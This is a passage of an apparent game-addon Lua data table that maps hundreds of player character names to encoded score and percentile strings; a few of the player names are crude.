["Alchaster"] = "CM:56/7%",
["Frappuccinox"] = "UM:322/37%",
["Lasynka"] = "CB:74/8%CM:61/21%",
["Loonitic"] = "LB:789/98%LM:977/98%",
["Bozmage"] = "RT:386/50%RB:390/56%RM:543/67%",
["Draigmagick"] = "CB:54/13%UM:102/38%",
["Dacookiejar"] = "CT:91/11%UB:355/48%EM:460/80%",
["Calv"] = "EM:670/77%",
["Swiftshots"] = "RM:683/72%",
["Snakenmyboot"] = "CM:16/2%",
["Mooq"] = "UM:143/46%",
["Raroch"] = "CM:187/21%",
["Aerotek"] = "UM:137/37%",
["Esoom"] = "RB:463/62%EM:733/78%",
["Scrubcat"] = "UM:91/35%",
["Valres"] = "UB:303/39%RM:563/60%",
["Priori"] = "UB:385/48%RM:683/72%",
["Pitkhum"] = "RB:481/61%EM:721/76%",
["Probowltroll"] = "EB:751/94%EM:904/92%",
["Moosasaur"] = "RB:198/63%RM:308/63%",
["Puyo"] = "UB:206/49%RM:561/63%",
["Edzelpretzel"] = "UM:133/39%",
["Oldboi"] = "RM:295/66%",
["Cenariå"] = "RT:180/59%UB:276/36%RM:525/62%",
["Aquack"] = "UT:222/42%EB:646/87%EM:805/90%",
["Darkwelador"] = "CM:1/0%",
["Zurkrul"] = "RB:225/51%RM:659/70%",
["Wuldy"] = "UB:325/42%RM:500/53%",
["Koffin"] = "RB:411/55%RM:505/55%",
["Daxos"] = "EB:665/86%EM:494/87%",
["Liddy"] = "RB:550/73%RM:354/70%",
["Dappenna"] = "CM:139/19%",
["Andmyax"] = "RB:369/74%RM:678/73%",
["Dnips"] = "CM:25/0%",
["Dipper"] = "EB:598/78%RM:717/74%",
["Lylith"] = "EB:619/81%RM:620/67%",
["Tetfire"] = "CM:98/12%",
["Selinak"] = "EB:537/83%EM:645/83%",
["Foxyo"] = "UM:426/49%",
["Lumiiya"] = "CM:40/16%",
["Dhcp"] = "CM:27/11%",
["Anubissious"] = "RM:486/70%",
["Dvasama"] = "CT:103/24%EB:596/78%UM:91/30%",
["Elvishmommy"] = "UT:308/40%RB:442/59%UM:347/35%",
["Apollodru"] = "RM:478/53%",
["Pathogenia"] = "RB:483/65%RM:485/53%",
["Toomanycats"] = "CB:155/18%UM:149/44%",
["Wildttuna"] = "RB:200/51%CM:34/13%",
["Lakeeta"] = "CT:0/1%UB:100/25%UM:124/35%",
["Pingpangpong"] = "RB:479/69%RM:444/67%",
["Conspiracy"] = "EB:731/92%EM:740/77%",
["Wangqinian"] = "RB:467/61%RM:513/57%",
["Flame"] = "CM:180/24%",
["Mightiest"] = "EM:738/80%",
["Saltydolitle"] = "RB:504/72%EM:726/83%",
["Lieur"] = "CT:16/8%UB:240/27%CM:167/21%",
["Medivhal"] = "CM:34/3%",
["Beefblastin"] = "CM:43/16%",
["Nickansell"] = "CB:187/24%UM:224/26%",
["Butchcut"] = "CB:28/1%UM:257/26%",
["Sanyangkkun"] = "UT:120/46%RB:308/67%EM:809/85%",
["Durgazork"] = "RB:511/71%EM:883/93%",
["Thuggery"] = "EB:595/77%RM:618/64%",
["Lysandro"] = "CM:233/23%",
["Sneaknstab"] = "UM:395/41%",
["Stonee"] = "CT:39/12%UB:364/49%RM:267/62%",
["Clobberella"] = "UM:89/29%",
["Tinymama"] = "RT:208/67%EB:668/85%RM:694/72%",
["Trucky"] = "UM:420/48%",
["Emberguesa"] = "UB:337/48%UM:375/49%",
["Dacerd"] = "EB:545/76%EM:738/80%",
["Sheeana"] = "CT:30/2%CB:165/21%UM:326/39%",
["Yobobare"] = "RT:59/66%EB:580/86%EM:509/76%",
["Thejuice"] = "CB:36/3%UM:119/34%",
["Chillis"] = "RT:163/59%RB:422/56%EM:445/84%",
["Vaeris"] = "CM:171/23%",
["Alkie"] = "LT:556/97%EB:620/94%LM:853/97%",
["Koggyx"] = "CT:38/12%CB:88/23%",
["Danglez"] = "UM:248/30%",
["Chodaboy"] = "CB:26/0%RM:245/61%",
["Rasamak"] = "CB:34/3%RM:532/57%",
["Sudoby"] = "UB:273/37%RM:218/53%",
["Nyangmal"] = "LT:525/97%EB:679/87%EM:904/92%",
["Okx"] = "CM:171/19%",
["Simplyleetz"] = "CM:49/6%",
["Filmcamera"] = "EB:541/77%UM:123/43%",
["Alexstraza"] = "ET:712/92%EB:711/91%EM:882/91%",
["Wüsthof"] = "EB:680/86%RM:689/73%",
["Sherrygodx"] = "EB:670/86%EM:793/85%",
["Zoochosis"] = "RT:320/51%LB:728/96%EM:795/92%",
["Wj"] = "CM:28/1%",
["Lig"] = "RT:484/66%EB:610/81%LM:950/96%",
["Tusko"] = "UM:213/27%",
["Lains"] = "RB:437/56%EM:770/80%",
["Kïnky"] = "UT:101/39%UB:156/41%EM:416/78%",
["Slushbergasm"] = "RT:241/73%RB:494/72%EM:560/89%",
["Ashia"] = "EB:656/85%EM:840/88%",
["Mootalstrike"] = "UT:316/46%EB:451/84%RM:611/69%",
["Dezie"] = "EB:593/78%EM:769/83%",
["Kashya"] = "RM:581/62%",
["Tyrum"] = "CT:96/12%CM:74/23%",
["Drshakalu"] = "RT:137/57%RB:244/66%RM:533/73%",
["Shelikeitbig"] = "EB:547/77%RM:623/68%",
["Lacey"] = "RT:189/67%EB:378/77%RM:236/59%",
["Hocuz"] = "CT:0/1%CM:40/4%",
["Halazzabuti"] = "CM:62/7%",
["Berr"] = "RT:92/62%EB:604/88%EM:820/92%",
["Bartolomeow"] = "RB:463/61%EM:802/83%",
["Obeko"] = "UB:125/31%RM:324/68%",
["Spoons"] = "CM:108/9%",
["Verychill"] = "UM:115/36%",
["Squidword"] = "RB:441/58%RM:558/59%",
["Chroy"] = "CM:182/24%",
["Drstrainge"] = "CT:62/21%CB:185/24%UM:140/42%",
["Fortweetney"] = "UM:301/36%",
["Cheaptrixx"] = "UB:309/42%UM:286/33%",
["Agarpain"] = "CT:16/3%CB:27/2%UM:124/35%",
["Zentherius"] = "UT:72/29%RB:328/69%RM:652/73%",
["Castingkouch"] = "ET:307/86%LB:780/97%LM:982/98%",
["Imasberlin"] = "CM:20/3%",
["Narro"] = "UB:168/41%UM:128/39%",
["Snuggaboo"] = "UB:159/49%UM:205/40%",
["Mitmael"] = "CB:182/23%CM:199/23%",
["Bartac"] = "UM:245/25%",
["Evark"] = "CM:41/15%",
["Shankndbank"] = "EB:640/83%UM:414/47%",
["Bearobics"] = "EB:430/78%EM:545/80%",
["Cursedcorpse"] = "CM:156/20%",
["Chupacabra"] = "UT:307/43%EB:705/89%EM:730/94%",
["Worthlessg"] = "CT:31/2%UB:306/41%RM:277/59%",
["Drwaffle"] = "CB:65/7%RM:347/72%",
["Pokedyou"] = "CT:70/23%CB:28/1%RM:333/66%",
["Pensylpainya"] = "EB:564/78%EM:799/89%",
["Imbored"] = "RB:472/67%RM:551/65%",
["Dekade"] = "RB:444/74%EM:760/88%",
["Heressy"] = "UB:255/35%EM:665/77%",
["Mystafakleez"] = "RB:474/69%EM:757/85%",
["Sturmana"] = "CT:33/9%CB:92/10%CM:16/1%",
["Jq"] = "EB:691/88%EM:737/77%",
["Clausius"] = "UM:239/29%",
["Mikhayla"] = "UM:244/30%",
["Sadz"] = "UM:420/47%",
["Qasz"] = "RT:143/50%CB:78/10%RM:495/54%",
["Ohmyrishman"] = "RB:517/66%RM:693/74%",
["Boppit"] = "UB:246/33%RM:231/62%",
["Pandaboy"] = "UM:348/39%",
["Needlepoint"] = "UM:113/37%",
["Hitmyblunt"] = "UT:83/32%CB:171/21%RM:214/55%",
["Vancleefish"] = "RM:225/52%",
["Cwayger"] = "CB:179/22%RM:307/67%",
["Obt"] = "EB:627/88%RM:264/55%",
["Wenlol"] = "CT:42/19%CB:133/17%RM:181/54%",
["Sukyoung"] = "CT:127/16%RB:311/72%EM:421/82%",
["Jeefma"] = "CT:47/5%UB:351/47%RM:626/68%",
["Myrella"] = "CT:146/20%CB:56/4%",
["Chetta"] = "UT:77/31%UB:345/43%UM:198/49%",
["Lilpops"] = "EB:642/81%EM:755/79%",
["Rollaz"] = "EB:634/82%RM:534/55%",
["Rosz"] = "UT:120/46%CB:30/2%RM:193/52%",
["Neferata"] = "UB:275/35%RM:523/56%",
["Zubzsmash"] = "EB:728/92%EM:682/75%",
["Zzeezzlez"] = "UB:159/40%RM:275/62%",
["Dragonfang"] = "RM:432/51%",
["Domeshott"] = "CB:183/24%RM:496/58%",
["Wahuwammedo"] = "CM:73/9%",
["Pyroclasmic"] = "CM:94/13%",
["Gartreme"] = "UB:251/32%CM:198/22%",
["Tinderalta"] = "UM:289/32%",
["Twitchthot"] = "RM:507/53%",
["Bubbleheerth"] = "RM:499/58%",
["Onyxxia"] = "CT:98/12%RB:544/72%EM:876/91%",
["Youfrozenbro"] = "UT:124/47%EB:598/83%LM:816/97%",
["Djkuya"] = "RT:548/74%EB:695/88%EM:887/91%",
["Askëladd"] = "UT:76/29%EB:431/82%EM:915/94%",
["Skinnythighs"] = "RT:521/67%EB:479/89%EM:878/94%",
["Tat"] = "CM:14/2%",
["Bingcheng"] = "CT:46/7%CB:49/7%",
["Wklng"] = "EB:650/84%EM:741/77%",
["Hughugeleg"] = "CB:101/11%EM:719/86%",
["Elveseer"] = "UM:86/25%",
["Lyual"] = "LB:756/95%LM:979/98%",
["Cablemx"] = "RM:272/67%",
["Solitaryman"] = "UB:96/27%CM:110/16%",
["Tidas"] = "UT:184/28%CB:149/19%UM:95/32%",
["Absense"] = "RB:412/60%RM:512/60%",
["Muzzle"] = "UB:320/42%EM:708/76%",
["Banjam"] = "CT:108/13%EB:509/91%LM:927/95%",
["Phantasmal"] = "EB:563/75%RM:385/73%",
["Rettodeath"] = "LB:757/95%LM:961/97%",
["Pippik"] = "UB:260/34%RM:534/63%",
["Mekanina"] = "RT:492/67%RB:545/74%RM:352/72%",
["Ieatcows"] = "ET:248/78%UB:86/49%RM:130/56%",
["Toxinator"] = "CM:101/10%",
["Clanbustacap"] = "EB:660/85%EM:789/82%",
["Gigstar"] = "EB:738/93%EM:817/85%",
["Jaïna"] = "RB:442/58%EM:898/93%",
["Thawny"] = "UT:331/43%RB:287/63%RM:724/71%",
["Mll"] = "CB:141/17%RM:505/59%",
["Saal"] = "ET:222/79%RB:503/67%EM:896/93%",
["Slamurai"] = "ET:728/93%LB:655/96%RM:667/71%",
["Rotor"] = "UM:101/31%",
["Azule"] = "CB:26/0%CM:90/13%",
["Freekill"] = "EB:528/80%EM:812/90%",
["Sinbads"] = "CM:153/16%",
["Shahealoneal"] = "RM:199/52%",
["Zok"] = "CB:120/14%EM:848/84%",
["Stalizzy"] = "CM:162/22%",
["Deikmunch"] = "CT:31/7%CB:215/24%UM:255/30%",
["Keow"] = "RB:229/54%RM:551/61%",
["Tectonics"] = "UM:196/48%",
["Highlanders"] = "EB:726/91%EM:833/86%",
["Delyse"] = "UM:380/46%",
["Bauman"] = "CM:72/8%",
["Merodne"] = "CM:186/24%",
["Shmoezy"] = "UB:169/42%RM:453/50%",
["Sorryforagro"] = "EM:701/75%",
["Nolimitz"] = "CB:151/19%UM:335/37%",
["Lurknstab"] = "UM:202/25%",
["Ballsackx"] = "UT:350/45%UB:320/43%RM:514/56%",
["Jerrygarciaa"] = "RM:519/56%",
["Fyobuffs"] = "UM:305/36%",
["Franman"] = "UB:254/32%UM:390/46%",
["Bwomsandra"] = "CM:139/14%",
["Søra"] = "RB:466/64%EM:436/78%",
["Whotank"] = "CT:28/6%RB:330/69%RM:659/70%",
["Salsabilla"] = "UT:68/31%UB:213/28%RM:264/66%",
["Rikasalin"] = "UT:251/32%EB:410/78%EM:722/75%",
["Willionaire"] = "ET:568/76%EB:707/91%EM:830/88%",
["Noxse"] = "UB:265/36%CM:112/18%",
["Favorable"] = "RT:200/68%EB:633/82%RM:561/60%",
["Pearly"] = "ET:461/94%EB:692/88%EM:597/88%",
["Council"] = "CT:36/2%EB:677/92%EM:718/79%",
["Deathgrim"] = "RM:499/54%",
["Milklul"] = "CT:0/6%UB:348/47%RM:302/71%",
["Thuro"] = "RT:201/68%UB:204/25%RM:520/61%",
["Ragvaldur"] = "ET:270/80%EB:436/82%RM:589/65%",
["Nwordstew"] = "ET:284/81%EB:749/94%SM:1019/99%",
["Cigarettes"] = "UT:89/40%CB:39/8%UM:371/44%",
["Silverrcrow"] = "ET:714/92%EB:585/77%",
["Frogslayer"] = "UT:103/41%EB:646/82%EM:787/82%",
["Pewpewmewmew"] = "ET:729/93%LB:652/97%EM:827/87%",
["Kyrial"] = "RT:510/68%EB:662/85%EM:737/77%",
["Pöwer"] = "CT:60/6%CB:74/9%CM:14/2%",
["Ponegaming"] = "CT:36/10%RB:519/71%UM:366/41%",
["Fathertouchi"] = "CT:80/7%CB:150/16%UM:372/44%",
["Eheheh"] = "ET:661/86%LB:754/95%EM:735/79%",
["Kaefitha"] = "UT:72/27%EB:574/77%UM:309/35%",
["Ùzamaki"] = "UT:356/48%RB:509/69%RM:657/70%",
["Mayen"] = "RB:393/54%UM:387/41%",
["Daitoudage"] = "EB:609/79%EM:719/78%",
["Ruusher"] = "CT:28/5%CB:78/19%UM:217/26%",
["Nevereazy"] = "UB:296/41%UM:140/47%",
["Gamjasalad"] = "ET:271/84%EB:532/93%EM:883/94%",
["Benwalker"] = "UM:89/33%",
["Resurglucia"] = "RT:141/58%RB:400/68%EM:700/84%",
["Alariele"] = "RT:389/51%LB:681/98%SM:892/99%",
["Nomage"] = "UM:350/41%",
["Valazza"] = "CB:37/6%UM:155/49%",
["Pazy"] = "LT:531/98%LB:672/98%LM:916/98%",
["Zukar"] = "LT:446/95%LB:715/98%EM:923/94%",
["Gnomehead"] = "RB:325/74%EM:776/87%",
["Ebolt"] = "ET:608/80%LB:726/95%EM:835/88%",
["Shoushou"] = "RT:406/55%EB:583/77%RM:497/51%",
["Hugznsnugz"] = "CB:126/15%",
["Xamragnu"] = "UT:377/49%RB:407/55%UM:339/39%",
["Lebronbron"] = "UB:303/41%RM:575/63%",
["Tokioshift"] = "LT:548/96%EB:543/93%EM:892/93%",
["Tudoupian"] = "CB:69/8%",
["Blakeya"] = "RT:403/54%RB:389/57%CM:52/6%",
["Tigos"] = "UM:261/35%",
["Brurok"] = "ET:268/81%LB:640/95%EM:611/88%",
["Vellenash"] = "ET:340/89%EB:620/81%EM:507/88%",
["Depeche"] = "ET:404/93%EB:547/90%EM:756/79%",
["Wyzzrd"] = "CM:28/0%",
["Luckyb"] = "ET:552/76%EB:710/91%EM:754/80%",
["Pisser"] = "CB:53/4%",
["Toxiholic"] = "LT:760/96%EB:726/92%RM:662/72%",
["Feedx"] = "UT:194/26%RB:392/50%UM:378/38%",
["Waschen"] = "EB:640/83%EM:715/75%",
["Vapriesteon"] = "UM:354/41%",
["Demental"] = "RB:413/56%RM:606/65%",
["Khál"] = "UB:296/39%UM:363/42%",
["Zomgdie"] = "RB:452/62%EM:761/82%",
["Throckmorton"] = "UB:111/27%CM:54/18%",
["Fryan"] = "EB:722/92%EM:865/89%",
["Myrilandal"] = "ET:411/94%EB:656/89%EM:860/90%",
["Freakonature"] = "ST:644/99%LB:754/98%LM:915/97%",
["Oyabun"] = "LT:488/96%EB:665/85%EM:767/80%",
["Anuz"] = "LT:518/97%EB:737/93%EM:876/91%",
["Mandani"] = "CT:76/9%CB:145/18%UM:110/36%",
["Higginzz"] = "EB:619/81%EM:793/88%",
["Kezo"] = "EB:665/86%EM:807/84%",
["Xiaosong"] = "RB:474/65%",
["Temperature"] = "UB:306/42%RM:628/69%",
["Juder"] = "EB:604/84%RM:627/73%",
["Usamichan"] = "ET:379/93%EB:675/90%EM:821/91%",
["Druidshi"] = "LT:409/97%EB:679/94%LM:951/98%",
["Tarabomba"] = "LT:474/95%EB:691/89%EM:839/88%",
["Zakuengineer"] = "ET:315/80%RB:382/67%EM:655/75%",
["Sidiösus"] = "ET:307/84%RB:463/62%",
["Longshao"] = "LT:499/97%EB:607/86%EM:784/89%",
["Miccaya"] = "ET:296/85%RB:401/58%RM:611/73%",
["Chlj"] = "ET:271/81%EB:684/88%EM:557/90%",
["Cnmomx"] = "LT:478/96%EB:561/91%LM:929/95%",
["Leohj"] = "CB:56/5%UM:141/41%",
["Arthurvinn"] = "UT:323/43%EB:690/88%EM:694/75%",
["Arkadut"] = "CT:6/3%RB:241/56%UM:128/41%",
["Mitakeran"] = "RM:493/54%",
["Skladramatic"] = "RB:560/74%RM:561/62%",
["Dogmeat"] = "UB:304/40%CM:93/11%",
["Sixthfinger"] = "RB:409/59%",
["Sinofblade"] = "EB:650/84%UM:430/45%",
["Ashinhide"] = "RM:274/68%",
["Eskandar"] = "LB:768/96%EM:917/94%",
["Crawler"] = "RB:447/59%RM:584/64%",
["Pedoso"] = "UM:231/28%",
["Bandengr"] = "RB:306/73%RM:238/54%",
["Vilseledd"] = "EB:619/81%RM:707/73%",
["Dakaashezz"] = "CB:4/0%CM:59/23%",
["Neidhart"] = "ET:261/78%RB:356/73%RM:653/68%",
["Kailyn"] = "UT:101/39%UB:201/26%UM:214/30%",
["Shenzi"] = "RB:542/71%RM:670/71%",
["Kusanagi"] = "UT:277/37%RB:329/70%EM:518/82%",
["Girthcurse"] = "EB:568/75%RM:340/69%",
["Pepegydra"] = "CM:219/21%",
["Mcmuffin"] = "UB:245/33%RM:178/54%",
["Rollincold"] = "CB:100/13%CM:76/6%",
["Syndru"] = "RB:215/50%RM:335/66%",
["Lilbuttery"] = "CB:117/15%RM:329/67%",
["Blackdusk"] = "RM:356/71%",
["Troyhaslamb"] = "ET:407/94%EB:736/93%EM:903/92%",
["Puffmyhammer"] = "CB:41/8%",
["Paath"] = "UB:349/44%RM:676/72%",
["Pokerchips"] = "UT:71/26%CB:91/12%EM:728/79%",
["Biscuitsbank"] = "EB:544/77%",
["Viscade"] = "EB:625/82%EM:709/75%",
["Karengotawap"] = "CB:125/16%CM:134/16%",
["Ea"] = "CB:71/9%",
["Citris"] = "UB:56/35%RM:191/54%",
["Relaxinn"] = "UB:236/30%RM:703/72%",
["Ihateboomers"] = "ET:616/82%RB:382/52%UM:248/28%",
["Lalalydia"] = "CT:78/9%CB:141/17%UM:119/37%",
["Spartank"] = "UB:115/26%UM:163/43%",
["Demerus"] = "ET:624/89%EB:639/88%EM:806/90%",
["Bigberries"] = "UM:401/43%",
["Anmisha"] = "EB:515/94%RM:167/59%",
["Tisky"] = "EB:359/79%RM:237/63%",
["Dinkerbell"] = "CT:65/9%UB:116/31%UM:127/46%",
["Slickback"] = "EB:723/91%EM:862/88%",
["Hawsanchop"] = "RB:240/57%RM:587/62%",
["Path"] = "CT:45/14%LB:749/95%LM:923/95%",
["Trollbungle"] = "RT:200/68%EB:540/75%RM:503/59%",
["Vulfpeck"] = "UB:173/43%UM:212/26%",
["Apoco"] = "UB:102/26%CM:19/16%",
["Skadizen"] = "RB:336/71%RM:514/57%",
["Manuocant"] = "CM:25/0%",
["Giveplz"] = "UB:356/49%RM:448/53%",
["Beefbun"] = "ET:325/89%EB:632/87%EM:736/86%",
["Yuqflashback"] = "ET:591/91%EB:680/93%LM:915/97%",
["Drwing"] = "RB:215/69%RM:486/74%",
["Akkai"] = "ET:572/81%EB:595/82%RM:446/52%",
["Rocoto"] = "UB:130/32%CM:160/20%",
["Lyann"] = "RB:407/58%UM:378/40%",
["Shamoanuh"] = "RT:321/73%EB:703/94%EM:769/88%",
["Hulkya"] = "CT:16/7%CB:71/14%UM:100/31%",
["Yakuja"] = "CT:54/21%RB:264/60%EM:778/82%",
["Amalgam"] = "CB:31/1%UM:89/28%",
["Olha"] = "CT:30/7%EB:423/86%RM:611/67%",
["Grennhunta"] = "RT:196/68%EB:415/81%EM:832/86%",
["Attene"] = "CT:134/17%EB:386/77%RM:671/71%",
["Meisterstuck"] = "RT:224/73%EB:497/87%EM:782/82%",
["Isabelle"] = "RT:137/58%EB:604/79%EM:770/87%",
["Verarosa"] = "UM:317/37%",
["Bobhope"] = "RT:175/67%EB:560/80%EM:848/92%",
["Bigwiz"] = "UT:63/28%RB:158/59%UM:268/44%",
["Bbuck"] = "RT:172/68%EB:473/90%EM:788/88%",
["Primitivist"] = "RT:478/74%EB:659/89%EM:802/90%",
["Tortugo"] = "RT:138/52%EB:393/79%EM:745/78%",
["Toomuchpwr"] = "RB:360/57%EM:588/77%",
["Franco"] = "RB:428/57%RM:510/54%",
["Nerzhud"] = "UB:236/30%UM:421/44%",
["Unlockeyy"] = "RT:452/60%EB:583/77%RM:621/64%",
["Armagedon"] = "CM:43/5%",
["Shinaira"] = "RT:222/73%LB:758/95%EM:883/90%",
["Pyrodavê"] = "ET:645/90%EB:673/94%RM:321/58%",
["Perf"] = "UM:355/42%",
["Scubastank"] = "UM:201/25%",
["Hollyn"] = "CT:36/11%RB:353/50%UM:250/35%",
["Moo"] = "LT:477/95%EB:613/80%RM:537/58%",
["Garallin"] = "CM:195/19%",
["Shamenoodles"] = "CM:184/20%",
["Xarekk"] = "RM:442/51%",
["Qcalanthe"] = "CB:204/24%RM:486/56%",
["Dasmiller"] = "UM:114/41%",
["Maheewho"] = "UB:242/29%UM:387/45%",
["Eviltoy"] = "CM:57/22%",
["Jimmbow"] = "CM:12/5%",
["Brohon"] = "RM:269/60%",
["Village"] = "CB:47/5%UM:114/32%",
["Daedum"] = "CM:20/7%",
["Goteks"] = "UB:183/47%RM:231/57%",
["Trungmeds"] = "RM:615/65%",
["Hydrogen"] = "ET:215/76%EB:720/94%LM:925/97%",
["Norwyn"] = "CT:42/4%CB:162/22%RM:475/52%",
["Keelb"] = "RM:627/68%",
["Gravystation"] = "RM:286/59%",
["Iovelylips"] = "UB:219/29%RM:632/67%",
["Slaughter"] = "UB:243/30%UM:185/49%",
["Scawts"] = "UM:142/42%",
["Evalon"] = "CB:169/20%UM:139/41%",
["Bkiller"] = "EB:543/75%LM:937/96%",
["Haryvaj"] = "CB:34/2%CM:100/12%",
["Tinyathena"] = "CM:1/0%",
["Neoptolemus"] = "CT:35/13%UB:373/49%RM:274/62%",
["Ripslaugh"] = "UB:351/43%RM:601/64%",
["Wojt"] = "CB:29/1%UM:230/27%",
["Erein"] = "EB:402/81%UM:290/39%",
["Alemark"] = "CM:51/5%",
["Jmelannister"] = "ET:581/78%EB:675/86%RM:569/64%",
["Steelspecter"] = "RM:552/61%",
["Méghan"] = "CM:81/11%",
["Leynd"] = "RB:444/58%EM:709/75%",
["Cupuhnoodle"] = "UM:341/40%",
["Ichiku"] = "RB:393/54%RM:479/52%",
["Ajinomoto"] = "EB:585/82%UM:354/46%",
["Tunatwhunter"] = "UM:408/46%",
["Polestar"] = "UT:254/34%EB:462/85%EM:817/85%",
["Nstemi"] = "CT:131/17%EB:443/77%EM:608/81%",
["Cowofduty"] = "UT:124/27%RB:237/64%EM:550/75%",
["Icewollowcom"] = "CM:57/8%",
["Velik"] = "CM:196/23%",
["Dam"] = "CM:44/5%",
["Deceit"] = "CM:35/9%",
["Kreeture"] = "RT:431/56%LB:749/97%LM:979/98%",
["Lelu"] = "CB:50/7%CM:49/6%",
["Grizzbear"] = "CT:61/6%EB:577/89%EM:501/76%",
["Taito"] = "RM:513/61%",
["Palsha"] = "CT:31/1%CB:26/0%RM:167/58%",
["Wurlitzer"] = "CM:60/23%",
["Luxsa"] = "CM:42/15%",
["Hyperversity"] = "UB:360/47%UM:170/47%",
["Gothicgf"] = "UT:271/49%EB:580/83%EM:736/86%",
["Anirul"] = "CB:90/9%UM:301/36%",
["Duu"] = "RM:645/71%",
["Lodjie"] = "ET:568/76%EB:624/86%RM:227/61%",
["Fadedrogue"] = "LB:758/95%LM:952/96%",
["Brimbly"] = "CB:76/7%UM:362/38%",
["Euphorik"] = "ET:305/86%EB:710/94%EM:632/92%",
["Mimizd"] = "UM:148/40%",
["Fëbrüärÿ"] = "UT:78/32%UB:214/49%UM:174/47%",
["Imlaw"] = "UM:187/46%",
["Popcornhand"] = "CM:38/12%",
["Bitesize"] = "CM:21/4%",
["Demonita"] = "UB:344/45%RM:535/59%",
["Weedsmokerx"] = "UB:400/48%RM:467/54%",
["Halfclapper"] = "RM:501/54%",
["Goodlife"] = "UM:389/46%",
["Lilricefield"] = "CM:189/21%",
["Vinsorio"] = "EB:491/88%EM:643/91%",
["Msmagi"] = "CB:85/9%CM:122/11%",
["Awesomename"] = "RM:502/51%",
["Meowvendetta"] = "RB:390/54%RM:317/69%",
["Ebehs"] = "UM:414/46%",
["Xiaokuouo"] = "EB:670/86%RM:693/74%",
["Girthycactus"] = "UM:402/43%",
["Stringtheory"] = "RM:560/62%",
["Rawpipe"] = "UT:353/49%UB:385/46%RM:574/65%",
["Flappyjack"] = "EB:608/77%EM:745/78%",
["Eclipz"] = "EM:845/92%",
["Eldigalor"] = "UT:229/31%RB:251/59%EM:380/75%",
["Lônghorn"] = "UT:91/33%CM:90/8%",
["Hìv"] = "UB:322/41%UM:476/49%",
["Akshoes"] = "RT:192/67%RB:505/67%EM:416/76%",
["Wõrf"] = "RB:335/70%UM:183/49%",
["Supergreen"] = "RB:427/53%EM:677/92%",
["Frostygirl"] = "RM:165/52%",
["Theseus"] = "RB:417/57%RM:559/62%",
["Vlucarti"] = "CT:69/8%CB:74/18%CM:60/19%",
["Sarind"] = "UT:129/49%RB:466/65%UM:421/47%",
["Killershade"] = "CT:82/10%EB:380/76%RM:528/59%",
["Apexx"] = "UT:297/38%RB:528/70%RM:666/73%",
["Icystorm"] = "CB:92/11%UM:217/27%",
["Bonescrolls"] = "RB:304/69%RM:422/50%",
["Jessyjell"] = "CM:52/19%",
["Cailthis"] = "RB:276/63%UM:254/29%",
["Barlender"] = "UT:278/41%EB:462/85%RM:429/50%",
["Decaffonly"] = "CB:183/24%UM:423/46%",
["Xêrc"] = "CB:92/9%UM:113/48%",
["Snowboun"] = "CM:62/8%",
["Potshoot"] = "UM:122/40%",
["Boarrider"] = "CM:159/14%",
["Xokfc"] = "CM:88/7%",
["Peelyacap"] = "ET:727/92%EB:660/85%EM:811/85%",
["Frostwyrm"] = "UM:226/28%",
["Shootsmcghee"] = "CB:146/19%UM:349/39%",
["Vaporized"] = "RB:506/73%RM:560/62%",
["Cyberlock"] = "EB:571/76%RM:310/66%",
["Whitegoodmån"] = "UM:26/30%",
["Substantialx"] = "RB:439/59%CM:29/2%",
["Huitoctobre"] = "RB:481/61%RM:654/73%",
["Ezpzw"] = "RT:196/68%EB:401/78%RM:500/57%",
["Billiemadhun"] = "UT:104/40%EB:649/84%RM:675/72%",
["Innz"] = "RM:188/50%",
["Trollinu"] = "CT:173/22%UB:334/46%RM:631/73%",
["Srgtribute"] = "EB:690/89%EM:737/79%",
["Goodhealth"] = "CB:57/4%UM:103/30%",
["Skoomadealer"] = "CM:31/12%",
["Jakomo"] = "CT:41/3%RB:394/53%EM:713/78%",
["Juanpull"] = "RM:520/57%",
["Windfurychad"] = "ET:642/79%LB:682/98%EM:668/76%",
["Donlock"] = "RT:538/71%EB:570/75%EM:739/79%",
["Nonger"] = "RT:207/67%RB:234/54%UM:401/45%",
["Sonavabeech"] = "RT:437/57%EB:466/88%EM:712/78%",
["Ammaron"] = "UT:248/46%EB:592/77%EM:698/77%",
["Barriert"] = "CB:29/1%RM:221/54%",
["Fosnine"] = "RM:550/60%",
["Hertlas"] = "CB:43/4%CM:90/11%",
["Cyberjar"] = "UB:280/37%UM:129/41%",
["Moonjay"] = "CT:146/18%EB:668/90%EM:726/79%",
["Contrary"] = "UB:341/46%CM:29/1%",
["Kristabull"] = "EB:706/89%EM:820/86%",
["Ahbronar"] = "ET:662/83%EB:546/78%EM:417/76%",
["Beanstalk"] = "CM:193/20%",
["Syndicate"] = "RB:426/55%RM:490/50%",
["Murtrim"] = "UT:82/33%RB:318/67%RM:694/74%",
["Bigguyman"] = "CT:184/23%RB:395/52%RM:582/64%",
["Acornthemage"] = "CB:163/21%UM:340/36%",
["Dday"] = "CT:50/22%RB:362/50%RM:587/68%",
["Smsh"] = "UM:76/26%",
["Timbrady"] = "EB:569/78%RM:633/70%",
["Annysamputry"] = "UM:78/28%",
["Pogjr"] = "RT:312/69%RM:314/58%",
["Ohmygawdhax"] = "ET:311/84%RB:375/50%RM:209/53%",
["Chamelio"] = "RT:446/59%EB:620/81%EM:780/83%",
["Skrew"] = "UM:174/48%",
["Lawditsafire"] = "UB:294/38%CM:132/12%",
["Ptwogaming"] = "CB:87/10%UM:82/29%",
["Muhshekies"] = "RM:621/68%",
["Itsmemojo"] = "CT:37/11%RB:346/72%UM:105/36%",
["Thunderhoof"] = "RM:599/64%",
["Vektian"] = "CB:131/16%EM:764/82%",
["Ahlyss"] = "CM:169/22%",
["Metallican"] = "UT:124/47%CB:188/24%UM:115/37%",
["Stuffsnatcha"] = "CB:44/9%",
["Guttuh"] = "UB:319/39%EM:799/83%",
["Jealousy"] = "RB:298/60%EM:730/84%",
["Gnargoyle"] = "UB:264/33%RM:570/63%",
["Pomdeterre"] = "CM:72/11%",
["Corekabot"] = "EB:622/80%RM:338/69%",
["Khals"] = "LT:589/98%LB:750/95%LM:954/97%",
["Tian"] = "RM:563/66%",
["Ligmæ"] = "ET:231/78%EB:550/81%EM:513/91%",
["Pzz"] = "ET:584/78%EB:688/87%EM:676/75%",
["Namewastaken"] = "RB:329/70%EM:389/75%",
["Jamsoda"] = "RT:565/74%EB:449/82%CM:43/5%",
["Reezzoo"] = "EB:698/89%EM:710/76%",
["Ephion"] = "CM:57/16%",
["Franyy"] = "CM:13/7%",
["Brackz"] = "CM:158/15%",
["Levojego"] = "RT:173/62%EB:577/76%EM:751/79%",
["Amkel"] = "UB:263/33%CM:61/8%",
["Gtec"] = "LB:775/97%EM:837/88%",
["Ronnyravioli"] = "CM:31/2%",
["Farm"] = "EB:540/76%EM:713/77%",
